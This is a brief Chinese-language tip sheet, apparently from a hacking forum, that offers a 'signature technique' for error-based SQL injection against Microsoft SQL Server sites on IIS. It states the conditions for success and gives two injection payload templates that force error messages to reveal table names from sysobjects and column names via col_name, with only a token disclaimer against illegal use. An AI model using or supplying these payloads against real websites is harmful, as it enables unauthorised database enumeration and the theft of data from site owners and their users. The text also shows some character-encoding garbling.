必殺技成功條件: 1.找到注入點(diǎn) 2.數(shù)據(jù)庫為SQLSERVER 3.IIS沒屏蔽錯(cuò)誤提示
注:因必殺技是我研究N久的心得,經(jīng)多次改良,成功率極高。請不要用於不合法用途上,否則後果自負(fù)。
[N] = 第N個(gè)表 ID=1 and (Select top 1 name from(Select top [N] id,name from sysobjects where xtype=char(85)) T order by id desc)>1
[T] = 表名 [N] = 第N個(gè)字段 ID=1 and (Select Top 1 col_name(object_id('[T]'),[N]) from sysobjects)>1
|